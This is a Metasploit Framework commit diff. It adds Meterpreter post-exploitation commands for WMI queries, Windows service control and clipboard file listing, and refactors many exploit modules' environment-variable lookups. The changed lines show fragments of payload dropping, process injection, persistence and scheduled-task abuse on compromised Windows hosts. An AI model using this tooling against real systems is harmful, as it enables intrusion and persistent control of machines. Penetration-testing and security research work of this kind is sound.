Land #3122, lots of Meterpreter updates

This lands the binaries built from Meterpreter as of:

rapid7/meterpreter#80 , also known as

commit 5addac75741fadfff35f4f7839cee6fd69705455

as well as the functional changes in:

rapid7/metasploit-framework#2782
rapid7/metasploit-framework#2889
rapid7/metasploit-framework#3061
rapid7/metasploit-framework#3085

lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb

@@ -134,15 +134,17 @@ private
       result[ts]['Text'] = t.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT)
     end
 
-    response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
+    response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES) do |fs|
-      ts = f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
+      ts = fs.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TIMESTAMP)
       result[ts] ||= {}
       result[ts]['Files'] ||= []
+      fs.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) do |f|
         result[ts]['Files'] << {
           :name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
           :size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
         }
       end
+    end
 
     response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg|
       if jpg

lib/rex/post/meterpreter/extensions/extapi/extapi.rb

@@ -5,6 +5,7 @@ require 'rex/post/meterpreter/extensions/extapi/window/window'
 require 'rex/post/meterpreter/extensions/extapi/service/service'
 require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
 require 'rex/post/meterpreter/extensions/extapi/adsi/adsi'
+require 'rex/post/meterpreter/extensions/extapi/wmi/wmi'
 
 module Rex
 module Post
@@ -32,7 +33,8 @@ class Extapi < Extension
               'window'    => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
               'service'   => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
               'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client),
-              'adsi' => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client)
+              'adsi'      => Rex::Post::Meterpreter::Extensions::Extapi::Adsi::Adsi.new(client),
+              'wmi'       => Rex::Post::Meterpreter::Extensions::Extapi::Wmi::Wmi.new(client)
             })
         },
       ])

lib/rex/post/meterpreter/extensions/extapi/service/service.rb

@@ -15,18 +15,26 @@ module Service
 ###
 class Service
 
+  SERVICE_OP_START   = 1
+  SERVICE_OP_PAUSE   = 2
+  SERVICE_OP_RESUME  = 3
+  SERVICE_OP_STOP    = 4
+  SERVICE_OP_RESTART = 5
+
   def initialize(client)
     @client = client
   end
 
+  #
   # Enumerate all the services on the target.
+  #
   def enumerate
     request = Packet.create_request('extapi_service_enum')
     response = client.send_request(request)
 
     services = []
 
-    response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) { |s|
+    response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) do |s|
       services << {
         :name         => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME),
         :display      => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME),
@@ -34,29 +42,59 @@ class Service
         :status       => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS),
         :interactive  => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE)
       }
-    }
-
-    return services.sort_by { |s| s[:name].upcase }
     end
 
+    services.sort_by { |s| s[:name].upcase }
+  end
+
+  #
   # Query some detailed parameters about a particular service.
+  #
   def query(service_name)
     request = Packet.create_request('extapi_service_query')
     request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name)
 
     response = client.send_request(request)
 
-    detail = {
+    {
       :starttype   => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE),
       :display     => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME),
       :startname   => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME),
       :path        => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH),
       :logroup     => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP),
       :interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE),
-      :dacl        => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL)
+      :dacl        => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL),
+      :status      => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STATUS)
     }
+  end
 
-    return detail
+  #
+  # Control a single service
+  #
+  def control(service_name, op)
+    if op.is_a? String
+      case op.strip.downcase
+      when "start"
+        op = SERVICE_OP_START
+      when "pause"
+        op = SERVICE_OP_PAUSE
+      when "resume"
+        op = SERVICE_OP_RESUME
+      when "stop"
+        op = SERVICE_OP_STOP
+      when "restart"
+        op = SERVICE_OP_RESTART
+      end
+    end
+
+    unless (op.is_a? Integer) && op >= SERVICE_OP_START && op <= SERVICE_OP_RESTART
+      raise ArgumentError, "Invalid operation: #{op}"
+    end
+
+    request = Packet.create_request('extapi_service_control')
+    request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name)
+    request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op)
+    client.send_request(request)
   end
 
   attr_accessor :client

lib/rex/post/meterpreter/extensions/extapi/tlv.rb

@@ -27,6 +27,10 @@ TLV_TYPE_EXT_SERVICE_QUERY_PATH             = TLV_META_TYPE_STRING | (TLV_TYPE_E
 TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP   = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24)
 TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE      = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
 TLV_TYPE_EXT_SERVICE_QUERY_DACL             = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)
+TLV_TYPE_EXT_SERVICE_QUERY_STATUS           = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 27)
+
+TLV_TYPE_EXT_SERVICE_CTRL_NAME              = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 28)
+TLV_TYPE_EXT_SERVICE_CTRL_OP                = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 29)
 
 TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD             = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
 
@@ -38,6 +42,7 @@ TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT    = TLV_META_TYPE_STRING | (TLV_TYPE_E
 TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE            = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
 TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME       = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
 TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE       = TLV_META_TYPE_QWORD  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_FILES           = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 44)
 
 TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG       = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
 TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX  = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
@@ -57,6 +62,14 @@ TLV_TYPE_EXT_ADSI_RESULT                    = TLV_META_TYPE_GROUP  | (TLV_TYPE_E
 TLV_TYPE_EXT_ADSI_MAXRESULTS                = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 60)
 TLV_TYPE_EXT_ADSI_PAGESIZE                  = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 61)
 
+TLV_TYPE_EXT_WMI_DOMAIN                     = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 65)
+TLV_TYPE_EXT_WMI_QUERY                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 66)
+TLV_TYPE_EXT_WMI_FIELD                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 67)
+TLV_TYPE_EXT_WMI_VALUE                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 68)
+TLV_TYPE_EXT_WMI_FIELDS                     = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 69)
+TLV_TYPE_EXT_WMI_VALUES                     = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 70)
+TLV_TYPE_EXT_WMI_ERROR                      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 71)
+
 end
 end
 end

lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb

@@ -0,0 +1,75 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Wmi
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# performing WMI queries.
+#
+###
+class Wmi
+
+  def initialize(client)
+    @client = client
+  end
+
+  #
+  # Perform a generic wmi query against the target machine.
+  #
+  # @param query [String] The WMI query string.
+  # @param root [String] Specify root to target, otherwise defaults
+  #   to 'root\cimv2'
+  #
+  # @returns [Hash] Array of field names with associated values.
+  #
+  def query(query, root = nil)
+    request = Packet.create_request('extapi_wmi_query')
+
+    request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank?
+    request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query)
+
+    response = client.send_request(request)
+
+    # Bomb out with the right error messa
+    error_msg = response.get_tlv_value(TLV_TYPE_EXT_WMI_ERROR)
+    raise error_msg if error_msg
+
+    fields = []
+    fields_tlv = response.get_tlv(TLV_TYPE_EXT_WMI_FIELDS)
+
+    # If we didn't get any fields back, then we didn't get any results.
+    # The reason is because without results, we don't know which fields
+    # were requested in the first place
+    return nil unless fields_tlv
+
+    fields_tlv.each(TLV_TYPE_EXT_WMI_FIELD) { |f|
+      fields << f.value
+    }
+
+    values = []
+    response.each(TLV_TYPE_EXT_WMI_VALUES) { |r|
+      value = []
+      r.each(TLV_TYPE_EXT_WMI_VALUE) { |v|
+        value << v.value
+      }
+      values << value
+    }
+
+    return {
+      :fields  => fields,
+      :values => values
+    }
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end
+

lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi.rb

@@ -17,6 +17,7 @@ class Console::CommandDispatcher::Extapi
   require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service'
   require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard'
   require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/adsi'
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi'
 
   Klass = Console::CommandDispatcher::Extapi
 
@@ -25,7 +26,8 @@ class Console::CommandDispatcher::Extapi
       Klass::Window,
       Klass::Service,
       Klass::Clipboard,
-      Klass::Adsi
+      Klass::Adsi,
+      Klass::Wmi
     ]
 
   include Console::CommandDispatcher

lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/service.rb

@@ -23,7 +23,8 @@ class Console::CommandDispatcher::Extapi::Service
   def commands
     {
       "service_enum"    => "Enumerate all registered Windows services",
-      "service_query" => "Query more detail about a specific Windows service"
+      "service_query"   => "Query more detail about a specific Windows service",
+      "service_control" => "Control a single service (start/pause/resume/stop/restart)"
     }
   end
 
@@ -33,6 +34,32 @@ class Console::CommandDispatcher::Extapi::Service
   def name
     "Extapi: Service Management"
   end
+
+  #
+  # Initialize the instance
+  #
+  def initialize(shell)
+    super
+
+    @status_map = {
+      1 => "Stopped",
+      2 => "Starting",
+      3 => "Stopping",
+      4 => "Running",
+      5 => "Continuing",
+      6 => "Pausing",
+      7 => "Paused"
+    }
+
+    @start_type_map = {
+      0 => "Boot",
+      1 => "System",
+      2 => "Automatic",
+      3 => "Manual",
+      4 => "Disabled"
+    }
+  end
+
   #
   # Options for the service_enum command.
   #
@@ -44,7 +71,7 @@ class Console::CommandDispatcher::Extapi::Service
   # Query a single service for more detail.
   #
   def cmd_service_enum(*args)
-    @@service_enum_opts.parse(args) { |opt, idx, val|
+    @@service_enum_opts.parse(args) do |opt, idx, val|
       case opt
       when "-h"
         print(
@@ -55,17 +82,7 @@ class Console::CommandDispatcher::Extapi::Service
           "able to interact with the desktop.\n\n")
           return true
       end
-    }
+    end
-
-    status_map = {
-      1 => "Stopped",
-      2 => "Starting",
-      3 => "Stopping",
-      4 => "Running",
-      5 => "Continuing",
-      6 => "Pausing",
-      7 => "Paused"
-    }
 
     services = client.extapi.service.enumerate
 
@@ -78,14 +95,14 @@ class Console::CommandDispatcher::Extapi::Service
       ]
     )
 
-    services.each { |s|
+    services.each do |s|
       table << [
         s[:pid],
-        status_map[s[:status]],
+        @status_map[s[:status]],
         s[:interactive] ? "Y" : "N",
         "#{s[:name].downcase} (#{s[:display]})"
       ]
-    }
+    end
 
     print_line
     print_line(table.to_s)
@@ -107,9 +124,9 @@ class Console::CommandDispatcher::Extapi::Service
   # Query a single service for more detail.
   #
   def cmd_service_query(*args)
-    args << "-h" if args.length == 0
+    args.unshift("-h") if args.length != 1
 
-    @@service_query_opts.parse(args) { |opt, idx, val|
+    @@service_query_opts.parse(args) do |opt, idx, val|
       case opt
       when "-h"
         print(
@@ -119,25 +136,18 @@ class Console::CommandDispatcher::Extapi::Service
           "binary path, DACL, load order group, start type and more.\n\n")
           return true
       end
-    }
+    end
 
     service_name = args.shift
 
-    start_type_map = {
-      0 => "Boot",
-      1 => "System",
-      2 => "Automatic",
-      3 => "Manual",
-      4 => "Disabled"
-    }
-
     detail = client.extapi.service.query(service_name)
 
     print_line
     print_line("Name        : #{service_name}")
     print_line("Display     : #{detail[:display]}")
     print_line("Account     : #{detail[:startname]}")
-    print_line("Start Type  : #{start_type_map[detail[:starttype]]}")
+    print_line("Status      : #{@status_map[detail[:status]]}")
+    print_line("Start Type  : #{@start_type_map[detail[:starttype]]}")
     print_line("Path        : #{detail[:path]}")
     print_line("L.O. Group  : #{detail[:logroup]}")
     print_line("Interactive : #{detail[:interactive] ? "Yes" : "No"}")
@@ -146,6 +156,39 @@ class Console::CommandDispatcher::Extapi::Service
 
   end
 
+  #
+  # Options for the service_control command.
+  #
+  @@service_control_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner" ]
+  )
+
+  #
+  # Query a single service for more detail.
+  #
+  def cmd_service_control(*args)
+    args.unshift("-h") if args.length != 2
+
+    @@service_control_opts.parse(args) do |opt, idx, val|
+      case opt
+      when "-h"
+        print(
+          "\nUsage: service_control [-h] <servicename> <op>\n" +
+          "   <servicename> : The name of the service to control.\n" +
+          "            <op> : The operation to perform on the service.\n" +
+          "                   Valid ops: start pause resume stop restart.\n\n")
+          return true
+      end
+    end
+
+    service_name = args[0]
+    op = args[1]
+
+    client.extapi.service.control(service_name, op)
+
+    print_good("Operation #{op} succeeded.")
+  end
+
 end
 
 end

lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/wmi.rb

@@ -0,0 +1,108 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Extended API WMI Querying interface.
+#
+###
+class Console::CommandDispatcher::Extapi::Wmi
+
+  Klass = Console::CommandDispatcher::Extapi::Wmi
+
+  include Console::CommandDispatcher
+
+  # Zero indicates "no limit"
+  DEFAULT_MAX_RESULTS = 0
+  DEFAULT_PAGE_SIZE   = 0
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    {
+      "wmi_query" => "Perform a generic WMI query and return the results"
+    }
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    "Extapi: WMI Querying"
+  end
+
+  #
+  # Options for the wmi_query command.
+  #
+  @@wmi_query_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner" ],
+    "-r" => [ true, "Specify a different root object (defaults to 'root\\CIMV2')" ]
+  )
+
+  def wmi_query_usage
+    print(
+      "\nUsage: wmi_query <query string> [-r root]\n\n" +
+      "Query the target and display the results.\n\n" +
+      @@wmi_query_opts.usage)
+  end
+
+  #
+  # Enumerate WMI objects.
+  #
+  def cmd_wmi_query(*args)
+    args.unshift("-h") if args.length < 1
+
+    root = nil
+
+    @@wmi_query_opts.parse(args) { |opt, idx, val|
+      case opt
+      when "-r"
+        root = val
+      when "-h"
+        wmi_query_usage
+        return true
+      end
+    }
+
+    query = args.shift
+
+    objects = client.extapi.wmi.query(query, root)
+
+    if objects
+      table = Rex::Ui::Text::Table.new(
+        'Header'    => query,
+        'Indent'    => 0,
+        'SortIndex' => 0,
+        'Columns'   => objects[:fields]
+      )
+
+      objects[:values].each do |c|
+        table << c
+      end
+
+      print_line
+      print_line(table.to_s)
+
+      print_line("Total objects: #{objects[:values].length}")
+    else
+      print_status("The WMI query yielded no results.")
+    end
+
+    print_line
+
+    return true
+  end
+
+end
+
+end
+end
+end
+end
+

modules/exploits/multi/http/struts_default_action_mapper.rb

@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
       win_file = file.gsub("/", "\\\\")
       if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)

modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb

@@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.delete_if do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)
@@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
   end

modules/exploits/windows/browser/honeywell_tema_exec.rb

@@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.each do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%WINDIR%")
+          wintemp = session.sys.config.getenv('WINDIR')
           win_file = "#{wintemp}\\Temp\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the
@@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
 

modules/exploits/windows/browser/notes_handler_cmdinject.rb

@@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.delete_if do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           # Meterpreter should do this automatically as part of
           # fs.file.rm().  Until that has been implemented, remove the
@@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
 

modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb

@@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def on_new_session(session)
     if session.type == "meterpreter"
       session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
-    end
 
       @dropped_files.delete_if do |file|
         win_file = file.gsub("/", "\\\\")
-      if session.type == "meterpreter"
         begin
-          wintemp = session.fs.file.expand_path("%TEMP%")
+          wintemp = session.sys.config.getenv('TEMP')
           win_file = "#{wintemp}\\#{win_file}"
           session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
           session.fs.file.rm(win_file)
@@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
           print_error("Failed to delete #{win_file}")
           false
         end
-
       end
     end
   end

modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb

@@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Use the system path for executable to run except the wordpad
     if client.sys.config.sysinfo["OS"] =~ /Windows XP/
-      windir = client.fs.file.expand_path("%ProgramFiles%")
+      windir = client.sys.config.getenv('ProgramFiles')
       cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
     else # Windows 2000
         cmd = "notepad.exe"

modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb

@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Usint this solution atm because I'm experiencing problems with railgun when trying
   # use GetTokenInformation
   def low_integrity_level?
-    tmp_dir = expand_path("%TEMP%")
+    tmp_dir = session.sys.config.getenv('TEMP')
     cd(tmp_dir)
     new_dir = "#{rand_text_alpha(5)}"
     begin

modules/exploits/windows/local/agnitum_outpost_acs.rb

@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore["WritableDir"] and not datastore["WritableDir"].empty?
       temp_dir = datastore["WritableDir"]
     else
-      temp_dir = expand_path("%TEMP%")
+      temp_dir = client.sys.config.getenv('TEMP')
     end
 
     print_status("Using #{temp_dir} to drop malicious DLL...")

modules/exploits/windows/local/ask.rb

@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore["PATH"]
       payload_path = datastore["PATH"]
     else
-      payload_path = session.fs.file.expand_path("%TEMP%")
+      payload_path = session.sys.config.getenv('TEMP')
     end
 
     cmd_location = "#{payload_path}\\#{payload_filename}"

modules/exploits/windows/local/bypassuac.rb

@@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
-
   def check_permissions!
     # Check if you are an admin
     vprint_status('Checking admin status...')

modules/exploits/windows/local/current_user_psexec.rb

@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Build a random name for the share and directory
       share_name = Rex::Text.rand_text_alphanumeric(8)
-      drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+      drive = session.sys.config.getenv('SYSTEMDRIVE')
       share_dir = "#{drive}\\#{share_name}"
 
       # Create them

modules/exploits/windows/local/ms10_092_schelevator.rb

@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
     cmd = datastore["CMD"] || nil
     upload_fn = nil
 
-    tempdir = session.fs.file.expand_path("%TEMP%")
+    tempdir = session.sys.config.getenv('TEMP')
     if not cmd
       # Get the exe payload.
       exe = generate_payload_exe
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
     # Create a new task to do our bidding, but make sure it doesn't run.
     #
     taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
-    sysdir = session.fs.file.expand_path("%SystemRoot%")
+    sysdir = session.sys.config.getenv('SystemRoot')
     taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
 
     print_status("Creating task: #{taskname}")

modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb

@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def low_integrity_level?
-    tmp_dir = expand_path("%USERPROFILE%")
+    tmp_dir = session.sys.config.getenv('USERPROFILE')
     cd(tmp_dir)
     new_dir = "#{rand_text_alpha(5)}"
     begin
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
     if datastore['TECHNIQUE'] == 'FILE'
       payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
       begin
-        tmp_dir = expand_path("%TEMP%")
+        tmp_dir = session.sys.config.getenv('TEMP')
         tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
         cd(tmp_dir)
         print_status("Trying to drop payload to #{tmp_dir}...")
@@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
 
       # Spawn low integrity cmd.exe
       print_status("Spawning Low Integrity Cmd Prompt")
-      windir = client.fs.file.expand_path("%windir%")
+      windir = session.sys.config.getenv('windir')
       li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
 
       count = count_cmd_procs

modules/exploits/windows/local/ms_ndproxy.rb

@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
   end
 
   def create_proc
-    windir = expand_path("%windir%")
+    windir = session.sys.config.getenv('windir')
     cmd = "#{windir}\\System32\\notepad.exe"
     # run hidden
     begin

modules/exploits/windows/local/nvidia_nvsvc.rb

@@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Launching notepad to host the exploit...")
 
-    windir = expand_path("%windir%")
+    windir = session.sys.config.getenv('windir')
     cmd = "#{windir}\\SysWOW64\\notepad.exe"
     process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
     host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)

modules/exploits/windows/local/payload_inject.rb

@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Creates a temp notepad.exe to inject payload in to given the payload
   # Returns process PID
   def create_temp_proc()
-    windir = client.fs.file.expand_path("%windir%")
+    windir = client.sys.config.getenv('windir')
     # Select path of executable to run depending the architecture
     if @payload_arch.first== "x86" and client.platform =~ /x86/
       cmd = "#{windir}\\System32\\notepad.exe"

modules/exploits/windows/local/persistence.rb

@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   # Writes script to target host
   def write_script_to_target(vbs,name)
-    tempdir = expand_path("%TEMP%")
+    tempdir = session.sys.config.getenv('TEMP')
     if name == nil
       tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
     else

modules/exploits/windows/local/ppr_flatten_rec.rb

@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
   def check
     os = sysinfo["OS"]
     if os =~ /windows/i
-      file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
+      file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
       major, minor, build, revision, branch = file_version(file_path)
       vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
 

modules/exploits/windows/local/s4u_persistence.rb

@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
   # Returns path for XML and payload
   def generate_path(rexename)
     # Generate a path to write payload and XML
-    path = datastore['PATH'] || expand_path("%TEMP%")
+    path = datastore['PATH'] || session.sys.config.getenv('TEMP')
     xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
     rexe_path = "#{path}\\#{rexename}"
     return xml_path,rexe_path

modules/exploits/windows/local/service_permissions.rb

@@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
 
     exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
 
-    sysdir = session.fs.file.expand_path("%SystemRoot%")
+    dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
-    tmpdir = session.fs.file.expand_path("%TEMP%")
+    sysdir = dir_env['SystemRoot']
+    tmpdir = dir_env['TEMP']
 
     print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
     begin
@@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
         moved = false
         configed = false
         #default path, but there should be an ImagePath registry key
-        source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
+        source = "#{sysdir}\\system32\\#{serv}.exe"
         #get path to exe; parse out quotes and arguments
         sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
         sourcemaybe = session.fs.file.expand_path(sourceorig)

modules/exploits/windows/misc/altiris_ds_sqli.rb

@@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
       end
     end
 
-    win_temp = client.fs.file.expand_path("%TEMP%")
+    win_temp = client.sys.config.getenv('TEMP')
     win_file = "#{win_temp}\\#{payload_exe}"
     print_status("Attempting to delete #{win_file} ...")
     client.shell_command_token(%Q|attrib.exe -r #{win_file}|)

